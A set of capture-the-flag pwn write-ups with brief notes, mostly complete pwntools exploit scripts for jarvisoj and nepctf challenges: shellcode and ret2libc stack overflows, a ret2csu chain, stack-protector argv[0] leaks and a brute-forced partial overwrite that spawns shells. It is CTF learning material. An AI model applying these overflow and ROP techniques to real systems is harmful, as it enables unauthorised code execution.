level1
#!/usr/bin/env python3
from pwn import *
# Debug logging makes pwntools hexdump every byte sent and received.
context(os="linux", arch="i386", log_level="debug")
# Target selector read by main(): 0 runs the local binary, anything else
# connects to the remote challenge service.
content = 1
def main():
    """Connect to the level1 target and deliver the stack-overflow payload.

    Reads the hex address the service prints in its first output line,
    then sends shellcode padded out to the saved-frame size with that
    address appended, and finally hands the session over interactively.
    """
    if content == 0:
        io = process("./level1.80eacdcd51aca92af7749d96efad7fb5")
    else:
        io = remote("pwn2.jarvisoj.com",9877)
    # The slice strips the fixed banner text around the address; the
    # offsets [14:-2] are specific to this service's output format.
    sh=io.recvuntil("\n")[14:-2]
    print(sh)
    shell_addr=int(sh.decode(),16)
    # Shellcode first, then filler up to 0x88+4 bytes (presumably buffer
    # plus saved ebp), so the leaked address lands in the return slot.
    payload =asm(shellcraft.sh())
    payload+=(0x88+4-len(payload))*b'a'
    payload+=p32(shell_addr)
    io.sendline(payload)
    io.interactive()
main()  # module-level call: also runs on import (no __main__ guard)
level3
重新做这个题弄懂了接收地址时以及p32,p64,p16的一些细节
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="i386", log_level="debug")
# 0 = local binary, otherwise the remote challenge service (see main()).
content = 1
#elf
# Values taken from the challenge binary: write's PLT stub and GOT slot,
# and a hard-coded address of main used as write's return address so the
# program prompts for a second input.
elf=ELF("level3")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048484
#libc
# Offsets inside the libc shipped with the challenge; main() combines
# them with the leaked GOT value to get runtime addresses.
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))
def main():
    """Two-stage overflow on level3: leak write@got, then call system.

    Stage 1 overflows the buffer with a write(1, write_got, 8) call that
    returns into main so a second input can be supplied. Stage 2 derives
    the libc base from the leak, computes system and the "/bin/sh" string
    from the known offsets, and overflows again with that call.
    """
    if content == 0:
        io = process("./level3")
    else:
        io = remote("pwn2.jarvisoj.com",9879)
    # Frame filler (0x88+4: presumably buffer plus saved ebp), then the
    # call laid out cdecl-style: write@plt, its return address (main),
    # and the three arguments fd, buf, count.
    payload =b'a'*(0x88+4)
    payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
    #leak
    io.sendlineafter("Input:\n",payload)
    #addr=io.recvline()[:-7]
    addr=io.recv(8)
    #addr=io.recv(4)
    print(addr)
    #addr=addr.ljust(8,b'\x00')
    print(addr)
    #write_addr=u32(addr)
    # NOTE(review): on this 32-bit target the 8 leaked bytes are
    # presumably write@got followed by the neighbouring GOT entry, so u64
    # folds that neighbour into the high dword; the commented-out u32
    # decodes only the pointer. Compare the printed value with the libc
    # offsets before trusting the computed addresses below.
    write_addr=u64(addr)
    print(write_addr)
    #count
    libcbase=write_addr-write_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    #getshell
    # system's own return address is a dummy ("aaaa"); the string pointer
    # follows it as system's first argument.
    payload=b'a'*(0x88+4)+p32(sys_addr)+b'aaaa'+p32(binsh_addr)
    io.sendline(payload)
    io.interactive()
main()  # module-level call: also runs on import (no __main__ guard)
level3_x64
x64位程序调用函数一般应该使用万能gadget(ret2csu)控制参数
这个题的ROPgadget中只能控制rdi和rsi,无法控制rdx;但由于调用read函数时rdx被置为0x200,之后没有改变,rdx大于8,因此能够leak出我们所需的地址,可以不用csu解题
这里练习一下ret2csu,
#!/usr/bin/env python3
from pwn import *
# Register control on this target: rdi and rsi have pop gadgets; rdx has
# none but still holds 0x200 from the preceding read() call, which is
# enough for the write() leak. All addresses below come from the
# challenge binary and its shipped libc.
context(os="linux", arch="amd64", log_level="debug")
# 0 = local binary, otherwise the remote challenge service.
content = 1
#elf
elf=ELF("level3_x64")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x40061A
# Universal-gadget (ret2csu) pieces used by csu(): presumably the
# pop-six-registers tail and the mov/call body of __libc_csu_init, plus
# a plain pop rdi; ret for the final system() call.
pop6_addr=0x4006AA
mov3_addr=0x400690
pop_rdi=0x4006b3
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))
def csu(r12,r13,r14,r15,ret):
    """Send one ret2csu stage over the module-level connection ``io``.

    The overflow first reaches the pop gadget, which loads the two fixed
    qwords (presumably rbx=0, rbp=1) and r12..r15 with the given values;
    the mov gadget then performs the call through r12, and once its
    trailing pops are consumed control continues at ``ret``.

    Args:
        r12, r13, r14, r15: register values for the csu gadget pair.
        ret: address executed after the gadget sequence.

    Relies on ``io``, ``pop6_addr`` and ``mov3_addr`` from module scope;
    sleeps one second so the caller can read the response.
    """
    payload =b'a'*(0x80+8)
    payload+=p64(pop6_addr)+p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(mov3_addr)
    # 56 bytes = 7 qwords, presumably the add rsp,8 plus six pops the csu
    # gadget executes before its ret reaches ``ret``.
    payload+=b'a'*(56)
    payload+=p64(ret)
    io.sendline(payload)
    sleep(1)
def main():
    """Leak write's libc address via the csu gadget, then return to system.

    ``io`` is declared global so csu() can send on the same connection.
    Stage 1: csu() issues what amounts to write(1, write_got, 8) and
    returns to main for a second prompt. Stage 2: resolve system and
    "/bin/sh" from the leak and overflow again with pop rdi; system.
    """
    global io
    if content == 0:
        io = process("./level3_x64")
    else:
        io = remote("pwn2.jarvisoj.com",9883)
    #leak
    io.recvuntil("Input:\n")
    # Presumably r12 -> call target (write via its GOT slot), r13 -> rdx
    # (length 8), r14 -> rsi (address to dump), r15 -> edi (fd 1).
    csu(write_got,8,write_got,1,main_addr)
    addr=io.recv(8)
    print(addr)
    # 64-bit target: the full 8-byte leak is the pointer itself.
    write_addr=u64(addr)
    print(write_addr)
    #count
    libcbase=write_addr-write_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    #getshell
    io.recvuntil("Input:\n")
    # 0x80+8 filler (presumably buffer plus saved rbp), then the ROP
    # chain: pop rdi; ret with the string address, then system.
    payload=b'a'*(0x80+8)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()
main()  # module-level call: also runs on import (no __main__ guard)
smashes
canary:ssp攻击(故意触发___stack_chk_fail,覆盖argv[0],输出已知地址字符串)
flag地址被重映射到了别的地方,可以用pwndbg的search 字符串命令或peda的find 字符串命令找到重映射后的地址
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
# 0 = local binary, otherwise the remote challenge service (see main()).
content = 1
def main():
    """Trigger the stack-protector failure so its message leaks memory.

    The overflow repeats a single address across the whole input so that
    argv[0] ends up pointing at it (the SSP technique described in the
    accompanying write-up) and the __stack_chk_fail message prints the
    string stored there.
    """
    if content == 0:
        io = process("./smashes.44838f6edd4408a53feb2e2bbfe5b229")
    else:
        io = remote("pwn.jarvisoj.com",9877)
    # 0x400d20 is presumably the remapped flag location found with the
    # debugger string search the write-up mentions; 0x200 copies is just
    # "enough" to reach argv[0].
    payload =p64(0x0400d20)*0x200
    io.recvuntil("Hello!\nWhat's your name? ")
    io.sendline(payload)
    io.interactive()
main()  # module-level call: also runs on import (no __main__ guard)
easystack(nepctf)
和smashes一个知识点
#!/usr/bin/env python3
from pwn import *
context(os="linux", arch="amd64", log_level="debug")
# 0 = local binary, otherwise the remote challenge service (see main()).
content = 1
def main():
    """Same stack-protector message leak as smashes, against easystack.

    Sends a repeated address so the canary check fails with argv[0]
    pointing at it; no banner is consumed first because this service
    reads input immediately.
    """
    if content == 0:
        io = process("./easystack")
    else:
        io = remote("node2.hackingfor.fun",35241)
    # 0x6cde20 is presumably where the flag string lives in this binary;
    # 100 copies is the overflow length the author settled on.
    payload = p64(0x6cde20)*100
    io.sendline(payload)
    io.interactive()
main()  # module-level call: also runs on import (no __main__ guard)
[签到] 送你一朵小红花 (nepctf)
知识点:
1.malloc开了0x18空间,而栈只有0x10空间
2.地址随机化,低位覆盖
#!/usr/bin/env python3
from pwn import *
context(log_level="debug")
# Reconnect and resend until a response contains the flag marker.
while 1:
    p = remote('node2.hackingfor.fun',32045)
    # Low byte of p16(0x4e1) only: with PIE the base is randomised, so
    # just the low-order byte is overwritten (original comment, translated).
    p.send(b'a'*(0x10)+p8(0xe1))
    res = p.recvall()
    if b"Nep{" in res:
        break
    # NOTE(review): the connection from a failed attempt is never closed;
    # closing p before looping back would avoid accumulating sockets.
print (res)